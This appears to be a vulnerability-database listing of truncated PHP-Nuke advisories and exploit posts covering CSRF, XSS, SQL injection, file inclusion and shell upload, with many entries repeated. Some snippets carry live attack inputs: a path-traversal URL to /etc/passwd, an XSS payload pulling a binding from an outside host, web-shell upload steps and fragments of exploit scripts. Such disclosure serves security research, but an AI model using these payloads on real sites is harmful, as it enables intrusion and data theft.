PHP-Nuke 8.x <= Cross Site Request Forgery (CSRF) / Anti-CSRF Bypass Vulnerability

PHP-Nuke 8.x = Cross Site Request Forgery CSRF / Anti-CSRF Bypass Vulnerability 1. OVERVIEW The PHP-Nuke version 8.x and lower versions are vulnerable to Cross Site Request Forgery CSRF because its Anti-CSRF mechanism Referer Check is found to be broken. 2. BACKGROUND PHP-Nuke is a Web Portal...

PHP-Nuke 8.x Cross Site Request Forgery

PHP-Nuke 8.x = Cross Site Request Forgery CSRF / Anti-CSRF Bypass Vulnerability 1. OVERVIEW The PHP-Nuke version 8.x and lower versions are vulnerable to Cross Site Request Forgery CSRF because its Anti-CSRF mechanism Referer Check is found to be broken. 2. BACKGROUND PHP-Nuke is a Web Portal...

PHP-Nuke 8.x <= Cross Site Scripting Vulnerability

PHP-Nuke 8.x = Cross Site Scripting Vulnerability 1. OVERVIEW The PHP-Nuke version 8.x and lower are vulnerable to Cross Site Scrtipting. 2. BACKGROUND PHP-Nuke is a Web Portal System or content management system. The goal of PHP-Nuke is to have an automated web site to distribute news and articl...

PHP-Nuke 8.x Cross Site Scripting

PHP-Nuke 8.x = Cross Site Scripting Vulnerability 1. OVERVIEW The PHP-Nuke version 8.x and lower are vulnerable to Cross Site Scrtipting. 2. BACKGROUND PHP-Nuke is a Web Portal System or content management system. The goal of PHP-Nuke is to have an automated web site to distribute news and articl...

PHP-Nuke 8.0 Cross Site Scripting

Hello list! I want to warn you about Insufficient Anti-automation and Cross-Site Scripting vulnerabilities in PHP-Nuke. SecurityVulns ID: 11485. ------------------------- Affected products: ------------------------- Vulnerable are PHP-Nuke 8.0 and previous versions. ---------- Details: ----------...

Новые уязвимости в PHP-Nuke

Здравствуйте 3APA3A! Сообщаю вам о найденных мною новых Insufficient Anti-automation и Cross-Site Scripting уязвимостях в системе PHP-Nuke. Insufficient Anti-automation WASC-21: http://site/modules.php?name=SubmitNews В форме нет защиты от автоматизированных запросов капчи. XSS WASC-08:...

PHP-Nuke Shell Upload

PHP-Nuke Shell Upload Vulnerability By : h311 c0d3 Contact : [email protected] Home : Black-Hat.cc Dork : inurl:modules.php?name=Upload Exploit : 1- you should first install Tamper Data from here https://addons.mozilla.org/en-us/firefox/addon/tamper-data/ 2- start tamper then, upload your shell as...

PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit

Exploit for php platform in category web applications !/usr/bin/perl 0-Day PHP-Nuke / / / / / / / / . ||/ | .. / | / // / | | \ \ \ \ \ / || |||| / | || \ /|| / / / /...

PHP-Nuke 8.1 Cross Site Scripting

Hello list! I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in PHP-Nuke. SecurityVulns ID: 11343. ------------------------- Affected products: ------------------------- Vulnerable are PHP-Nuke 8.1 and previous versions. Tested in PHP-Nuke 8.0 and 8.1...

XSS и IAA уязвимости в PHP-Nuke

Здравствуйте 3APA3A! Сообщаю вам о найденных мною Cross-Site Scripting та Insufficient Anti-automation уязвимостях в PHP-Nuke. XSS WASC-08: POST запрос на странице http://site/modules.php?name=Search " style="-moz-binding:url'http://websecurity.com.ua/webtools/xss.xmlxss' В поле поиска. Это верси...

MaticMarket 2.02 for PHP Nuke LFI Vulnerability

Exploit for php platform in category web applications MaticMarket 2.02 for PHP Nuke LFI Vulnerability Url: http://sourceforge.net/projects/maticmarket Author: xer0x Expl: http://localhost/modules/maticmarket/deco/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00...

PHP-Nuke MaticMarket 2.02 - Local File Inclusion

PHP-Nuke MaticMarket 2.02 - Local File Inclusion MaticMarket 2.02 for PHP Nuke LFI Vulnerability Url: http://sourceforge.net/projects/maticmarket Author: xer0x Expl: http://localhost/modules/maticmarket/deco/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00...

MaticMarket 2.02 Local File Inclusion

MaticMarket 2.02 for PHP Nuke LFI Vulnerability Url: http://sourceforge.net/projects/maticmarket Author: xer0x Expl: http://localhost/modules/maticmarket/deco/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00...

PHP-Nuke MaticMarket 2.02 - Local File Inclusion

MaticMarket 2.02 for PHP Nuke LFI Vulnerability Url: http://sourceforge.net/projects/maticmarket Author: xer0x Expl: http://localhost/modules/maticmarket/deco/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00...

PHP-Nuke Search module SQL injection vulnerability and fix-vulnerability warning-the black bar safety net

Affected version: PHP-Nuke 7.0 - 8.1.0.3.5 b Vulnerabilitydescription: PHP-Nuke is a popular web site creation and management tools, you can use many databasessoftwareas backend, such as MySQL, PostgreSQL, mSQL and Interbase, Sybase, etc. PHP-Nuke Search module in the realization of the presence...

PHP-Nuke Search模块SQL注入漏洞

BUGTRAQ ID: 45165 PHP-Nuke是一个广为流行的网站创建和管理工具，可使用很多数据库软件作为后端，如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。 PHP-Nuke的Search模块在实现上存在SQL注入漏洞，攻击者可利用此漏洞控制应用程序，访问或修改数据，利用后台数据库中的潜在漏洞。 此漏洞源于在SQL查询中使用用户提供的数据之前未进行有效过滤。 PHP-Nuke 7.0 - 8.1.0.3.5b 厂商补丁： PHP-Nuke --------...

PHP-Nuke 8.1.0.3.5b SQL Injection

= 5 this may take some minutes.. / EXPLOIT / errorreporting0; iniset"defaultsockettimeout",30; settimelimit0; function httpsend$host, $packet $sock = fsockopen$host, 80; $c = 0; while !$sock if $c++ == 10 die; print "\n- No response from ".$host.":80 Trying again..."; $sock = fsockopen$host,80;...

Php-Nuke (modules.php id) SQL Injection Exploit (.py)

Exploit for php platform in category web applications ===================================================== Php-Nuke modules.php id SQL Injection Exploit .py ===================================================== !/usr/bin/env python -- coding:cp1254 -- Php-Nuke modules.php id SQL Injection Exploi...

PHP-Nuke 8.1-seo-Arabic Remote File Inclusion

Exploit Title: PHP-Nuke-8.1-seo-Arabic Remote File Include Date: 12-8-2010 Author: LoSt.HaCkEr Software Link: http://scripts.bdr130.net/faile/PHP-Nuke-8.1-seo-Arabic.zip Version: v 8.1 Tested on: Windows XP CVE : هكر المسيب Contact: LoSt.HaCkEratyahoodotcom Exploit:...

PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion

PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion Exploit Title: PHP-Nuke-8.1-seo-Arabic Remote File Include Date: 12-8-2010 Author: LoSt.HaCkEr Software Link: http://scripts.bdr130.net/faile/PHP-Nuke-8.1-seo-Arabic.zip Version: v 8.1 Tested on: Windows XP CVE : هكر المسيب Contact:...